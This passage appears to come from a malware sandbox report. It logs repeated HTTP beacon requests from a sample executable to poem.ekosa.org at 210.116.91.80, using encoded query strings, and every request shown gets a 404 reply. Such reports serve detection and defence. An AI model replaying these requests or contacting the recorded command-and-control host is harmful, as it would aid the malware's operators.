      Jan 11, 2021 17:54:56.951431990 CET83INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.449758210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:54:57.222948074 CET86OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:54:57.485622883 CET90INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:54:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      10192.168.2.449771210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:02.398149014 CET245OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:02.659898996 CET249INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:02 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      100192.168.2.449878210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:54.989450932 CET4307OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:55.253542900 CET4307INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      101192.168.2.449879210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:55.525911093 CET5086OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:55.787642002 CET5087INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:55 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      102192.168.2.449880210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:56.170101881 CET5087OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:56.433552980 CET5088INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      103192.168.2.449881210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:56.700265884 CET5089OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:56.958790064 CET5089INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:56 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      104192.168.2.449882210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:57.228408098 CET5090OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:57.488831043 CET5091INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      105192.168.2.449883210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:57.871535063 CET5092OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:58.131800890 CET5092INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:57 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      106192.168.2.449884210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:58.467463970 CET5093OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:58.729218960 CET5093INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      107192.168.2.449885210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:59.168667078 CET5094OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:59.432661057 CET5095INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:58 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
